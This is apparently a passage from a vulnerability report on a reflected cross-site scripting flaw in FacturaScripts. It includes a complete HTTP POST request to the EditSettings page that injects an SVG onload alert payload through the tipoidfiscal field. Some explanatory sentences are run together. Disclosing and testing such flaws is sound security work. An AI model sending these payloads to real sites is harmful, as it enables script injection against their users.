There are two fields that can insert the XSS payload by the error log.
codbalance
fieldtipoidfiscal
field in Fiscal IdBoth fields require 1 and 25 numbers or letters, no spaces, accents or any other character.
. So we can not store the payload, but we can trigger a reflected XSS via the error log.
POST /facturascripts/EditSettings HTTP/1.1
Host: 127.0.0.1
...
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="action"
edit
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="activetab"
EditIdentificadorFiscal
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="code"
CI
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="multireqtoken"
61893af8ff1671201dcbeaff4d052cf544c4de1e|MvOEut
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="tipoidfiscal"
CI<svg/onload='alert(/xss/);'>
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="codeid"
------WebKitFormBoundaryYIfWjQXpEB2jLexN--